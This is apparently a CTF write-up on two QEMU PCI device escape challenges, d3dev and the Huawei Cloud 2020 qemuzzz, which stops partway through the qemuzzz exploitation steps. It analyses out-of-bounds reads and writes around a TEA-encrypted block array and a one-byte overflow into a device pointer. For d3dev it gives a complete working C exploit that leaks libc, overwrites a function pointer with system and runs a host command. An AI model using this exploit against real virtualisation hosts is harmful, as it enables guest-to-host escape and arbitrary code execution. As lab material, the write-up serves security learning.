When mmio_write_part == 1, the value (blocks[seek + addr / 8] & 0xFFFFFFFF) | ((blocks[seek + addr / 8] & 0xFFFFFFFF00000000) + (val << 32)) is encrypted as shown below and then written back to blocks[seek + addr / 8].
    static inline void tea_encrypt_64(uint32_t *lw, uint32_t *hi, const uint32_t k[4])
    {
        uint32_t sum = 0;
        do {
            sum -= 0x61C88647U;
            *lw += (sum + *hi) ^ (k[1] + (*hi >> 5)) ^ (k[0] + (*hi << 4));
            *hi += (sum + *lw) ^ (k[3] + (*lw >> 5)) ^ (k[2] + (*lw << 4));
        } while (sum != 0xC6EF3720U);
    }
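This gives us a way to perform an out-of-bounds write:
First, run the value val we want to write through the decryption routine to obtain val'.
Then, with mmio_write_part == 0, write the low 32 bits of val'. This zeroes the high 32 bits of the slot, which prepares it for the next step.
Next, with mmio_write_part == 1, write the high 32 bits of val'. This step leaves the low 32 bits written in the previous step unchanged.
After d3dev_mmio_write encrypts the slot, the net effect of this sequence is an out-of-bounds write of val.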
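The write sequence above can be simulated outside QEMU. This is a minimal sketch under stated assumptions: write_model is a hypothetical stand-in that keeps only the fields d3dev_mmio_write touches, model_write mirrors the device's two-phase logic, and the key is whatever the model holds (all zero after the PMIO 0x04 reset). It starts from mmio_write_part == 0.

```c
#include <stddef.h>
#include <stdint.h>

static void tea_encrypt_64(uint32_t *lw, uint32_t *hi, const uint32_t k[4])
{
    uint32_t sum = 0;
    do {
        sum -= 0x61C88647U;
        *lw += (sum + *hi) ^ (k[1] + (*hi >> 5)) ^ (k[0] + (*hi << 4));
        *hi += (sum + *lw) ^ (k[3] + (*lw >> 5)) ^ (k[2] + (*lw << 4));
    } while (sum != 0xC6EF3720U);
}

static void tea_decrypt_64(uint32_t *lw, uint32_t *hi, const uint32_t k[4])
{
    uint32_t sum = 0xC6EF3720U;
    do {
        *hi -= (sum + *lw) ^ (k[3] + (*lw >> 5)) ^ (k[2] + (*lw << 4));
        *lw -= (sum + *hi) ^ (k[1] + (*hi >> 5)) ^ (k[0] + (*hi << 4));
        sum += 0x61C88647U;
    } while (sum != 0);
}

/* Hypothetical model of the state used by d3dev_mmio_write. */
typedef struct {
    uint32_t write_part;
    uint32_t key[4];
    uint64_t blocks[4];
} write_model;

/* Mirrors one 4-byte MMIO write handled by the device. */
void model_write(write_model *s, size_t idx, uint32_t val)
{
    if (s->write_part) {
        uint32_t lw = (uint32_t)s->blocks[idx];
        uint32_t hi = (uint32_t)((s->blocks[idx] >> 32) + val);
        tea_encrypt_64(&lw, &hi, s->key);
        s->blocks[idx] = ((uint64_t)hi << 32) | lw;
        s->write_part = 0;
    } else {
        s->blocks[idx] = val; /* zero-extended: high half becomes 0 */
        s->write_part = 1;
    }
}

/* Store an arbitrary 64-bit target: write D(target) in two halves. */
void model_write64(write_model *s, size_t idx, uint64_t target)
{
    uint32_t lw = (uint32_t)target;
    uint32_t hi = (uint32_t)(target >> 32);
    tea_decrypt_64(&lw, &hi, s->key); /* val' = D(target) */
    model_write(s, idx, lw);          /* phase 0: low half, high half zeroed */
    model_write(s, idx, hi);          /* phase 1: high half added, slot encrypted */
}
```

Calling model_write64 on a zero-initialised write_model leaves blocks[idx] equal to the target, since the device's encryption cancels the decryption applied beforehand.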
d3dev_mmio_read is shown below. Like d3dev_mmio_write, it can access blocks out of bounds.
    static uint64_t d3dev_mmio_read(void *opaque, hwaddr addr, unsigned int size)
    {
        struct d3devState *s = (struct d3devState *)opaque;
        uint64_t blk = s->blocks[s->seek + ((unsigned int)(addr) >> 3)];
        uint32_t lw = (uint32_t)blk;
        uint32_t hi = (uint32_t)(blk >> 32);

        tea_decrypt_64(&lw, &hi, s->key);

        if (s->mmio_read_part) {
            s->mmio_read_part = 0;
            return (uint64_t)hi;
        } else {
            s->mmio_read_part = 1;
            return (uint64_t)lw;
        }
    }
d3dev_mmio_read decrypts the 8 bytes at blocks[seek + addr / 8] as shown below. It returns the high 32 bits of the result if mmio_read_part is 1 and the low 32 bits otherwise, toggling the flag on every read.
    static inline void tea_decrypt_64(uint32_t *lw, uint32_t *hi, const uint32_t k[4])
    {
        uint32_t sum = 0xC6EF3720U;
        do {
            *hi -= (sum + *lw) ^ (k[3] + (*lw >> 5)) ^ (k[2] + (*lw << 4));
            *lw -= (sum + *hi) ^ (k[1] + (*hi >> 5)) ^ (k[0] + (*hi << 4));
            sum += 0x61C88647U;
        } while (sum != 0);
    }
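However, the leaked value has been run through this TEA transform, and without the key we cannot recover the original data from it.
But when mmio_write_part == 1, the device encrypts (blocks[seek + addr / 8] & 0xFFFFFFFF) | ((blocks[seek + addr / 8] & 0xFFFFFFFF00000000) + (val << 32)) and writes the result back to blocks[seek + addr / 8]. With val = 0, the effect is to encrypt the 64-bit value at an out-of-bounds location in place.
A subsequent out-of-bounds read then decrypts that encrypted value, which yields the data originally stored there.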
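The encrypt-in-place-then-read trick can be sketched with a small model. Everything here is an illustration under assumptions: leak_model and its helpers are hypothetical, both part flags start at 0, and the first write goes to a scratch slot purely to arm mmio_write_part without clobbering the target. The leak does not depend on knowing the key.

```c
#include <stddef.h>
#include <stdint.h>

static void tea_encrypt_64(uint32_t *lw, uint32_t *hi, const uint32_t k[4])
{
    uint32_t sum = 0;
    do {
        sum -= 0x61C88647U;
        *lw += (sum + *hi) ^ (k[1] + (*hi >> 5)) ^ (k[0] + (*hi << 4));
        *hi += (sum + *lw) ^ (k[3] + (*lw >> 5)) ^ (k[2] + (*lw << 4));
    } while (sum != 0xC6EF3720U);
}

static void tea_decrypt_64(uint32_t *lw, uint32_t *hi, const uint32_t k[4])
{
    uint32_t sum = 0xC6EF3720U;
    do {
        *hi -= (sum + *lw) ^ (k[3] + (*lw >> 5)) ^ (k[2] + (*lw << 4));
        *lw -= (sum + *hi) ^ (k[1] + (*hi >> 5)) ^ (k[0] + (*hi << 4));
        sum += 0x61C88647U;
    } while (sum != 0);
}

/* Hypothetical model of the state used by the MMIO read and write handlers. */
typedef struct {
    uint32_t read_part;
    uint32_t write_part;
    uint32_t key[4];
    uint64_t blocks[4];
} leak_model;

static void model_write(leak_model *s, size_t idx, uint32_t val)
{
    if (s->write_part) {
        uint32_t lw = (uint32_t)s->blocks[idx];
        uint32_t hi = (uint32_t)((s->blocks[idx] >> 32) + val);
        tea_encrypt_64(&lw, &hi, s->key);
        s->blocks[idx] = ((uint64_t)hi << 32) | lw;
        s->write_part = 0;
    } else {
        s->blocks[idx] = val;
        s->write_part = 1;
    }
}

static uint32_t model_read(leak_model *s, size_t idx)
{
    uint32_t lw = (uint32_t)s->blocks[idx];
    uint32_t hi = (uint32_t)(s->blocks[idx] >> 32);
    tea_decrypt_64(&lw, &hi, s->key);
    s->read_part ^= 1;
    return s->read_part ? lw : hi; /* low half first, then high half */
}

/* Recover the original value stored at blocks[target]. */
uint64_t model_leak(leak_model *s, size_t target, size_t scratch)
{
    model_write(s, scratch, 0); /* phase 0 on a throwaway slot arms write_part */
    model_write(s, target, 0);  /* phase 1 with val = 0: slot becomes E(original) */
    uint64_t lo = model_read(s, target);
    uint64_t hi = model_read(s, target);
    return (hi << 32) | lo;     /* D(E(original)) == original */
}
```

One side effect worth noting: after the leak the target slot holds the encrypted value, so a pointer stored there has to be rewritten before the device uses it again.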
Exploitation
An out-of-bounds read past blocks leaks the address of the rand_r function stored in the rand_r field, which in turn gives the libc base.
    struct d3devState {
        PCIDevice pdev;
        MemoryRegion mmio;
        MemoryRegion pmio;
        uint32_t memory_mode;
        uint32_t seek;
        uint32_t init_flag;
        uint32_t mmio_read_part;
        uint32_t mmio_write_part;
        uint32_t r_seed;
        uint64_t blocks[0x101];
        uint32_t key[4];
        int (*rand_r)(uint32_t *);
    };
Because the 0x04 branch of d3dev_pmio_write zeroes the key field, the key is known.
    case 0x04:
        memset(s->key, 0, sizeof(s->key));
        break;
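The 0x1C branch of d3dev_pmio_write calls through the rand_r function pointer, passing the address of r_seed as the argument, and the value of r_seed is set from val just before the call.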
    case 0x1C:
        s->r_seed = (uint32_t)val;
        {
            uint32_t *p = s->key;
            do {
                *p++ = (uint32_t)s->rand_r(&s->r_seed);
            } while (p != (uint32_t *)&s->rand_r);
        }
        break;
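So an out-of-bounds write can replace rand_r with the address of system, with the command to execute placed in r_seed.
However, r_seed holds only 4 bytes, so everything after the first 4 bytes of the command has to be written into blocks, which immediately follows r_seed in the struct.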
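The split of the command across r_seed and blocks can be illustrated with a stand-alone sketch. The struct seed_view is a hypothetical cut-out of d3devState that keeps only r_seed and the start of blocks, with one preceding 32-bit field so the two stay adjacent; place_command and command_seen_by_callback are illustrative names. In the real device the bytes in blocks would have to be planted through MMIO using the decrypt-then-write sequence, which this sketch does not model.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical cut-out of d3devState: r_seed sits directly before blocks. */
typedef struct {
    uint32_t mmio_write_part;
    uint32_t r_seed;
    uint64_t blocks[4];
} seed_view;

/* Put the first 4 bytes of cmd in r_seed and the rest at the start of blocks.
   Returns 0 on success, -1 if cmd (with its terminator) does not fit. */
int place_command(seed_view *s, const char *cmd)
{
    uint8_t raw[sizeof s->r_seed + sizeof s->blocks] = {0};
    size_t n = strlen(cmd) + 1;
    if (n > sizeof raw) {
        return -1;
    }
    memcpy(raw, cmd, n);
    memcpy(&s->r_seed, raw, sizeof s->r_seed);                   /* bytes 0..3 */
    memcpy(s->blocks, raw + sizeof s->r_seed, sizeof s->blocks); /* bytes 4..  */
    return 0;
}

/* The string a callback receiving &r_seed would see. */
const char *command_seen_by_callback(const seed_view *s)
{
    return (const char *)s + offsetof(seed_view, r_seed);
}
```

For a command such as "cat /flag", r_seed holds "cat " and blocks[0] holds "/flag" plus the terminator, so the callback argument reads as one contiguous C string.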
Full exploit

    #define _GNU_SOURCE  /* must come before any #include */
    #include <errno.h>
    #include <fcntl.h>
    #include <inttypes.h>
    #include <limits.h>
    #include <stdbool.h>
    #include <stddef.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/io.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define IORESOURCE_MEM 0x00000200ULL

    typedef struct {
        volatile uint8_t* bar;        /* mapped virtual base */
        size_t size;                  /* real resource size (end - start + 1) */
        size_t map_len;               /* mmap length, page aligned */
        int fd;                       /* open /sys/.../resourceN */
        int res_idx;                  /* selected BAR index */
        uint64_t phys_start;          /* physical start of the BAR */
        uint64_t phys_end;            /* physical end, inclusive */
        unsigned long long res_flags; /* flags column of the resource line */
        bool inited;
    } mmio_ctx_t;

    static mmio_ctx_t g_mmio = {0};

    /* Resolve a BDF or a /sys/.../resource path into the resource file and device directory. */
    static int build_paths(const char* bdf_or_path, char* resource_txt, size_t txt_sz,
                           char* dev_dir, size_t dir_sz) {
        if (!bdf_or_path || !*bdf_or_path) {
            errno = EINVAL;
            return -1;
        }
        if (strchr(bdf_or_path, '/')) {
            snprintf(resource_txt, txt_sz, "%s", bdf_or_path);
            snprintf(dev_dir, dir_sz, "%s", bdf_or_path);
            char* slash = strrchr(dev_dir, '/');
            if (!slash) {
                errno = EINVAL;
                return -1;
            }
            *slash = '\0';
            /* If resourceN was passed, fall back to the directory's resource file. */
            if (strstr(resource_txt, "/resource") &&
                resource_txt[strlen(resource_txt) - 1] >= '0' &&
                resource_txt[strlen(resource_txt) - 1] <= '9') {
                snprintf(resource_txt, txt_sz, "%s/resource", dev_dir);
            }
        } else {
            snprintf(resource_txt, txt_sz, "/sys/bus/pci/devices/%s/resource", bdf_or_path);
            snprintf(dev_dir, dir_sz, "/sys/bus/pci/devices/%s", bdf_or_path);
        }
        return 0;
    }

    static int parse_mem_bar(const char* resource_txt, int bar_idx, unsigned long long*
start, unsigned long long * end, unsigned long long * flags, int * picked_idx) { FILE* fp = fopen(resource_txt, "r" ); if (!fp) return -1 ; int idx = 0 , sel = -1 ; char line[256 ]; while (fgets(line, sizeof (line), fp)) { unsigned long long s = 0 , e = 0 , f = 0 ; if (sscanf (line, "%llx %llx %llx" , &s, &e, &f) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(f & IORESOURCE_MEM) || e < s) { fclose(fp); errno = EINVAL; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } else { if (idx <= 5 && (f & IORESOURCE_MEM)) { if (e < s) { fclose(fp); errno = ERANGE; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } idx++; } fclose(fp); if (sel < 0 ) { errno = ENOENT; return -1 ; } if (picked_idx) *picked_idx = sel; return 0 ; } int mmio_init (const char * bdf_or_path, int bar_idx) { if (g_mmio.inited) { errno = EALREADY; return -1 ; } char resource_txt[PATH_MAX]; char dev_dir[PATH_MAX]; if (build_paths(bdf_or_path, resource_txt, sizeof (resource_txt), dev_dir, sizeof (dev_dir)) != 0 ) return -1 ; unsigned long long start = 0 , end = 0 , flags = 0 ; int res_idx = -1 ; if (parse_mem_bar(resource_txt, bar_idx, &start, &end, &flags, &res_idx) != 0 ) return -1 ; size_t size = (size_t )((end - start) + 1ULL ); size_t pg = (size_t )sysconf(_SC_PAGESIZE); size_t map_len = (size + pg - 1 ) & ~(pg - 1 ); char res_path[PATH_MAX]; snprintf (res_path, sizeof (res_path), "%s/resource%d" , dev_dir, res_idx); int fd = open(res_path, O_RDWR | O_SYNC); if (fd < 0 ) return -1 ; void * map = mmap(NULL , map_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0 ); if (map == MAP_FAILED) { int sv = errno; close(fd); errno = sv; return -1 ; } g_mmio.bar = (volatile uint8_t *)map ; g_mmio.size = size; g_mmio.map_len = map_len; g_mmio.fd = fd; g_mmio.res_idx = res_idx; g_mmio.phys_start = (uint64_t )start; g_mmio.phys_end = (uint64_t )end; g_mmio.res_flags = flags; 
g_mmio.inited = true ; return 0 ; } void mmio_fini (void ) { if (!g_mmio.inited) return ; if (g_mmio.bar) munmap((void *)g_mmio.bar, g_mmio.map_len); if (g_mmio.fd >= 0 ) close(g_mmio.fd); memset (&g_mmio, 0 , sizeof (g_mmio)); } volatile void * mmio_base (void ) { return g_mmio.bar; }size_t mmio_size (void ) { return g_mmio.size; }int mmio_bar_index (void ) { return g_mmio.res_idx; }uint64_t mmio_phys_base (void ) { return g_mmio.phys_start; }uint64_t mmio_phys_limit (void ) { return g_mmio.phys_end; } uint64_t mmio_offset_to_phys (size_t off) { if (!g_mmio.inited) { errno = EPERM; return 0 ; } if (off >= g_mmio.size) { errno = ERANGE; return 0 ; } return g_mmio.phys_start + (uint64_t )off; } uint64_t mmio_virt_to_phys (const void * p) { if (!g_mmio.inited || !p) { errno = EPERM; return 0 ; } uintptr_t base = (uintptr_t )g_mmio.bar; uintptr_t addr = (uintptr_t )p; if (addr < base || addr >= base + g_mmio.size) { errno = EINVAL; return 0 ; } size_t off = (size_t )(addr - base); return g_mmio.phys_start + (uint64_t )off; } static inline int chk (size_t off, size_t width) { if (!g_mmio.inited) { errno = EPERM; return -1 ; } if (off + width > g_mmio.size) { errno = ERANGE; return -1 ; } return 0 ; } uint8_t mmio_read8 (size_t off) { if (chk(off, 1 )) return 0 ; return *(volatile uint8_t *)(g_mmio.bar + off); } uint16_t mmio_read16 (size_t off) { if (chk(off, 2 )) return 0 ; return *(volatile uint16_t *)(g_mmio.bar + off); } uint32_t mmio_read32 (size_t off) { if (chk(off, 4 )) return 0 ; return *(volatile uint32_t *)(g_mmio.bar + off); } uint64_t mmio_read64 (size_t off) { if (chk(off, 8 )) return 0 ; return *(volatile uint64_t *)(g_mmio.bar + off); } void mmio_write8 (size_t off, uint8_t v) { if (chk(off, 1 )) return ; *(volatile uint8_t *)(g_mmio.bar + off) = v; } void mmio_write16 (size_t off, uint16_t v) { if (chk(off, 2 )) return ; *(volatile uint16_t *)(g_mmio.bar + off) = v; } void mmio_write32 (size_t off, uint32_t v) { if (chk(off, 4 )) return ; *(volatile 
uint32_t *)(g_mmio.bar + off) = v; } void mmio_write64 (size_t off, uint64_t v) { if (chk(off, 8 )) return ; *(volatile uint64_t *)(g_mmio.bar + off) = v; } volatile void * mmio_ptr (size_t off) { if (chk(off, 1 )) return NULL ; return (volatile void *)(g_mmio.bar + off); } #define _GNU_SOURCE #include <errno.h> #include <inttypes.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/io.h> #include <unistd.h> #define IORESOURCE_IO 0x00000100ULL typedef struct { uint16_t base; uint32_t size; uint16_t grant_base; uint32_t grant_len; bool have_ioperm; bool have_iopl; bool inited; } pio_ctx_t ; static pio_ctx_t g_pio = {0 };static int parse_io_bar (const char * bdf_or_path, int bar_idx, uint16_t * out_base, uint32_t * out_size) { char path[256 ]; if (strchr (bdf_or_path, '/' )) { snprintf (path, sizeof (path), "%s" , bdf_or_path); } else { snprintf (path, sizeof (path), "/sys/bus/pci/devices/%s/resource" , bdf_or_path); } FILE* fp = fopen(path, "r" ); if (!fp) return -1 ; int idx = 0 , chosen = -1 ; char line[256 ]; while (fgets(line, sizeof (line), fp)) { unsigned long long start = 0 , end = 0 , flags = 0 ; if (sscanf (line, "%llx %llx %llx" , &start, &end, &flags) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(flags & IORESOURCE_IO)) { fclose(fp); errno = EINVAL; return -1 ; } if (end < start || start > 0xFFFF ULL) { fclose(fp); errno = ERANGE; return -1 ; } *out_base = (uint16_t )start; *out_size = (uint32_t )(end - start + 1 ); chosen = idx; break ; } } else { if (idx <= 5 && (flags & IORESOURCE_IO)) { if (end < start || start > 0xFFFF ULL) { fclose(fp); errno = ERANGE; return -1 ; } *out_base = (uint16_t )start; *out_size = (uint32_t )(end - start + 1 ); chosen = idx; break ; } } idx++; } fclose(fp); if (chosen < 0 ) { errno = ENOENT; return -1 ; } return 0 ; } static int acquire_io_priv (uint16_t base, uint32_t size, uint16_t * grant_base, uint32_t * grant_len, bool * 
have_ioperm, bool * have_iopl) { uint32_t len = size; if ((unsigned )base + len > 0x10000 u) len = 0x10000 u - base; if (len == 0 ) len = 1 ; if (ioperm(base, len, 1 ) == 0 ) { *grant_base = base; *grant_len = len; *have_ioperm = true ; *have_iopl = false ; return 0 ; } if (iopl(3 ) == 0 ) { *grant_base = 0 ; *grant_len = 0 ; *have_ioperm = false ; *have_iopl = true ; return 0 ; } return -1 ; } int pio_init (const char * bdf_or_path, int bar_idx) { if (g_pio.inited) { errno = EALREADY; return -1 ; } uint16_t base = 0 ; uint32_t size = 0 ; if (parse_io_bar(bdf_or_path, bar_idx, &base, &size) != 0 ) return -1 ; uint16_t gbase = 0 ; uint32_t glen = 0 ; bool have_perm = false , have_iopl = false ; if (acquire_io_priv(base, size, &gbase, &glen, &have_perm, &have_iopl) != 0 ) return -1 ; g_pio.base = base; g_pio.size = size; g_pio.grant_base = gbase; g_pio.grant_len = glen; g_pio.have_ioperm = have_perm; g_pio.have_iopl = have_iopl; g_pio.inited = true ; return 0 ; } void pio_fini (void ) { if (!g_pio.inited) return ; if (g_pio.have_ioperm) (void )ioperm(g_pio.grant_base, g_pio.grant_len, 0 ); if (g_pio.have_iopl) (void )iopl(0 ); memset (&g_pio, 0 , sizeof (g_pio)); } uint16_t pio_base (void ) { return g_pio.base; }uint32_t pio_size (void ) { return g_pio.size; }static inline int pio_port (uint32_t off, int width, uint16_t * port_out) { if (!g_pio.inited) { errno = EPERM; return -1 ; } if ((uint64_t )off + (uint64_t )width > g_pio.size) { errno = ERANGE; return -1 ; } uint32_t p = (uint32_t )g_pio.base + off; if (p > 0xFFFF u) { errno = ERANGE; return -1 ; } *port_out = (uint16_t )p; return 0 ; } uint8_t pio_read8 (uint32_t off) { uint16_t p; if (pio_port(off, 1 , &p)) return 0 ; return inb(p); } uint16_t pio_read16 (uint32_t off) { uint16_t p; if (pio_port(off, 2 , &p)) return 0 ; return inw(p); } uint32_t pio_read32 (uint32_t off) { uint16_t p; if (pio_port(off, 4 , &p)) return 0 ; return inl(p); } void pio_write8 (uint32_t off, uint8_t v) { uint16_t p; if 
(pio_port(off, 1 , &p)) return ; outb(v, p); } void pio_write16 (uint32_t off, uint16_t v) { uint16_t p; if (pio_port(off, 2 , &p)) return ; outw(v, p); } void pio_write32 (uint32_t off, uint32_t v) { uint16_t p; if (pio_port(off, 4 , &p)) return ; outl(v, p); } void tea_encrypt (uint64_t * val, const uint32_t key[4 ]) { uint32_t val_hi = *val >> 32 , val_lw = *val; for (uint32_t delta = 0x9e3779b9 ; delta != 0x6526b0d9 ; delta -= 0x61C88647 ) { val_lw += (delta + val_hi) ^ (key[1 ] + (val_hi >> 5 )) ^ (key[0 ] + (val_hi << 4 )); val_hi += (delta + val_lw) ^ (key[3 ] + (val_lw >> 5 )) ^ (key[2 ] + (val_lw << 4 )); } *val = (1ULL * val_hi << 32 ) | val_lw; } void tea_decrypt (uint64_t * val, const uint32_t key[4 ]) { uint32_t val_hi = *val >> 32 , val_lw = *val; for (uint32_t delta = 0xC6EF3720 ; delta; delta += 0x61C88647 ) { val_hi -= (delta + val_lw) ^ (key[3 ] + (val_lw >> 5 )) ^ (key[2 ] + (val_lw << 4 )); val_lw -= (delta + val_hi) ^ (key[1 ] + (val_hi >> 5 )) ^ (key[0 ] + (val_hi << 4 )); } *val = (1ULL * val_hi << 32 ) | val_lw; } int main () { mmio_init("0000:00:03.0" , 0 ); pio_init("0000:00:03.0" , 1 ); pio_write32(4 , 0x114514 ); pio_write32(0x8 , 0x100 ); uint32_t lo = mmio_read32(0x18 ); uint32_t hi = mmio_read32(0x18 ); uint64_t rand_r_addr = ((uint64_t )hi << 32 ) | lo; tea_encrypt(&rand_r_addr, (uint32_t []){0 , 0 , 0 , 0 }); printf ("[+] rand_r addr: %p\n" , rand_r_addr); size_t libc_base = rand_r_addr - 0x48d30 ; printf ("[+] libc base: %p\n" , libc_base); size_t system_addr = libc_base + 0x53290 ; printf ("[+] system addr: %p\n" , system_addr); tea_decrypt(&system_addr, (uint32_t []){0 , 0 , 0 , 0 }); mmio_write32(0x18 , system_addr); mmio_write32(0x18 , system_addr >> 32 ); pio_write32(0x8 , 0 ); char cmd[] = "/usr/bin/gnome-calculator" ; for (int i = 4 ; i < sizeof (cmd); i += 8 ) { uint64_t val = *(uint64_t *)&cmd[i]; tea_decrypt(&val, (uint32_t []){0 , 0 , 0 , 0 }); mmio_write32(i, val); mmio_write32(i, val >> 32 ); } pio_write32(0x1C , 
*(uint32_t *)cmd); return 0 ; }
Huawei Cloud 2020 qemuzzz
Vulnerability analysis
#include "qemu/osdep.h"
#include "hw/pci/pci.h"
#include "qapi/error.h"
#include "exec/memory.h"
#include "exec/cpu-common.h"
#include "hw/pci/pci_regs.h"

#define TYPE_ZZZ "zzz"
OBJECT_DECLARE_SIMPLE_TYPE(ZZZState, ZZZ)

#define ZZZ_REG_OFFSET 0x10
#define ZZZ_REG_LEN    0x18
#define ZZZ_REG_ADDR   0x20
#define ZZZ_CMD_XOR    0x50
#define ZZZ_CMD_KICK   0x60

#define ZZZ_BAR0_SIZE 0x100000
#define ZZZ_BUF_SIZE  0x1000

struct ZZZState {
    PCIDevice parent_obj;
    MemoryRegion mmio;

    hwaddr addr;
    uint16_t len;
    uint16_t offset;
    int16_t rsvd0;
    int16_t rsvd1;

    uint8_t buf[ZZZ_BUF_SIZE];
    struct ZZZState *opaque;
    void (*cpu_physical_memory_rw)(hwaddr, uint8_t *, hwaddr, int);
};

static uint64_t zzz_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    ZZZState *s = opaque;

    if (addr <= 0xFFF) {
        return s->buf[addr];
    }
    return 0;
}

static void zzz_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)
{
    ZZZState *s = opaque;

    switch (addr) {
    case ZZZ_REG_ADDR:
        s->addr = ((hwaddr)val) << 12;
        break;
    case ZZZ_REG_OFFSET:
        if (val > 0x0FFFu) {
            if (s->offset > 0x0FFFu) {
                s->offset = 0;
            }
        } else {
            s->offset = (uint16_t)val;
        }
        break;
    case ZZZ_REG_LEN:
        s->len = (uint16_t)val;
        break;
    case ZZZ_CMD_XOR: {
        uint32_t off = s->offset;
        int len0 = (int)(s->len & 0x7FFE);
        if ((int)off + len0 >= 0x1000) {
            len0 = 4095 - (int)off;
        }
        int words = len0 >> 1;
        for (int j = 0; j < words; ++j) {
            uint16_t *p = (uint16_t *)(s->buf + off + (j * 2));
            *p ^= 0x0209u;
        }
        break;
    }
    case ZZZ_CMD_KICK: {
        ZZZState *t = s->opaque;
        if ((t->addr & 0xFFF) == 0) {
            int16_t len1 = (int16_t)t->len;
            uint32_t off = t->offset;
            uint16_t l = (uint16_t)(len1 & 0x7FFE);
            if ((int)(off + (uint32_t)(len1 & 0x7FFE) - 1) <= 0x1000) {
                uint8_t *buf = &t->buf[off];
                void (*fn)(hwaddr, uint8_t *, hwaddr, int) = s->cpu_physical_memory_rw;
                if (len1 & 1) {
                    fn(t->addr, buf, l, 1);
                } else {
                    fn(t->addr, buf, l, 0);
                }
                if ((int16_t)t->len < 0) {
                    pci_set_irq(&t->parent_obj, 1);
                }
            }
        }
        break;
    }
    default:
        break;
    }
}

static const MemoryRegionOps zzz_mmio_ops = {
    .read = zzz_mmio_read,
    .write = zzz_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
};

static void zzz_instance_init(Object *obj)
{
    ZZZState *s = ZZZ(obj);

    s->opaque = s;
    s->cpu_physical_memory_rw = cpu_physical_memory_rw;
}

static void pci_zzz_realize(PCIDevice *pdev, Error **errp)
{
    ZZZState *s = ZZZ(pdev);

    pdev->config[PCI_INTERRUPT_PIN] = 1;
    memory_region_init_io(&s->mmio, OBJECT(s), &zzz_mmio_ops, s, "zzz-mmio", ZZZ_BAR0_SIZE);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio);
}

static void pci_zzz_uninit(PCIDevice *pdev)
{
}

static void zzz_class_init(ObjectClass *oc, void *data)
{
    PCIDeviceClass *k = PCI_DEVICE_CLASS(oc);

    k->realize = pci_zzz_realize;
    k->exit = pci_zzz_uninit;
    k->vendor_id = 0x1234;
    k->device_id = 0x2333;
    k->revision = 0x10;
    k->class_id = PCI_CLASS_OTHERS;
}

static const TypeInfo zzz_info = {
    .name = TYPE_ZZZ,
    .parent = TYPE_PCI_DEVICE,
    .instance_size = sizeof(ZZZState),
    .instance_init = zzz_instance_init,
    .class_init = zzz_class_init,
};

static void pci_zzz_register_types(void)
{
    type_register_static(&zzz_info);
}

type_init(pci_zzz_register_types);
When addr is 0x60 (ZZZ_CMD_KICK) there is a one-byte out-of-bounds access: the bounds check accepts off + len - 1 == 0x1000, so the transfer may touch one byte past the end of the 0x1000-byte buf.
case ZZZ_CMD_KICK: {
    ZZZState *t = s->opaque;
    if ((t->addr & 0xFFF) == 0) {
        int16_t len1 = (int16_t)t->len;
        uint32_t off = t->offset;
        uint16_t l = (uint16_t)(len1 & 0x7FFE);

        if ((int)(off + (uint32_t)(len1 & 0x7FFE) - 1) <= 0x1000) {
            uint8_t *buf = &t->buf[off];
            void (*fn)(hwaddr, uint8_t *, hwaddr, int) = s->cpu_physical_memory_rw;

            if (len1 & 1) {
                fn(t->addr, buf, l, 1);
            } else {
                fn(t->addr, buf, l, 0);
            }

            if ((int16_t)t->len < 0) {
                pci_set_irq(&t->parent_obj, 1);
            }
        }
    }
    break;
}
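The off-by-one can be checked with a small model of the KICK bounds test. This is only a sketch: `kick_check` and `bytes_past_buf` are illustrative helper names, not part of the challenge, and the model assumes the 32-bit unsigned sum is reinterpreted as a signed int exactly as the C cast does.

```python
BUF_SIZE = 0x1000  # ZZZ_BUF_SIZE in the device source


def kick_check(offset: int, length: int) -> bool:
    """Mirror `(int)(off + (len & 0x7FFE) - 1) <= 0x1000` from ZZZ_CMD_KICK."""
    xfer = length & 0x7FFE
    total = (offset + xfer - 1) & 0xFFFFFFFF  # uint32_t arithmetic
    if total >= 0x80000000:                   # reinterpret as signed int
        total -= 1 << 32
    return total <= 0x1000


def bytes_past_buf(offset: int, length: int) -> int:
    """Bytes the transfer touches beyond buf; 0 if the check rejects it."""
    if not kick_check(offset, length):
        return 0
    end = offset + (length & 0x7FFE)
    return max(0, end - BUF_SIZE)


if __name__ == "__main__":
    # offset 0xFFF with a 2-byte transfer passes the check and spills one byte
    print(bytes_past_buf(0xFFF, 2))
```

Because the transfer length is always even, the spill only happens for odd offsets, and it is never more than one byte.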
In the ZZZState structure, buf is immediately followed by opaque, so the one-byte overflow can modify the low byte of the opaque pointer.
struct ZZZState {
    PCIDevice parent_obj;
    MemoryRegion mmio;

    hwaddr addr;
    uint16_t len;
    uint16_t offset;
    int16_t rsvd0;
    int16_t rsvd1;

    uint8_t buf[ZZZ_BUF_SIZE];
    struct ZZZState *opaque;
    void (*cpu_physical_memory_rw)(hwaddr, uint8_t *, hwaddr, int);
};
The addr, len and offset passed to cpu_physical_memory_rw are all located through the opaque pointer. Redirecting opaque to a forged ZZZState therefore lets us forge addr, len and offset and obtain a much larger out-of-bounds read/write.
Reading and writing the data that follows buf lets us leak QEMU addresses and hijack control flow.
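Exploitation
1. Use the out-of-bounds write to increase opaque, so that the addr, len and offset of the ZZZState it now points to are values we forged inside buf.
2. Read out of bounds to obtain opaque and cpu_physical_memory_rw, which leaks the address of the device state and a QEMU address.
3. At this point the addr == 0x60 command can only perform reads, so we use the XOR with 0x209 offered by addr == 0x50 to modify len so that addr == 0x60 can perform writes. For the XORed len and offset to still pass the check at addr == 0x60 and leave a large enough out-of-bounds range, the addr and len forged in step 1 have to be brute-forced.
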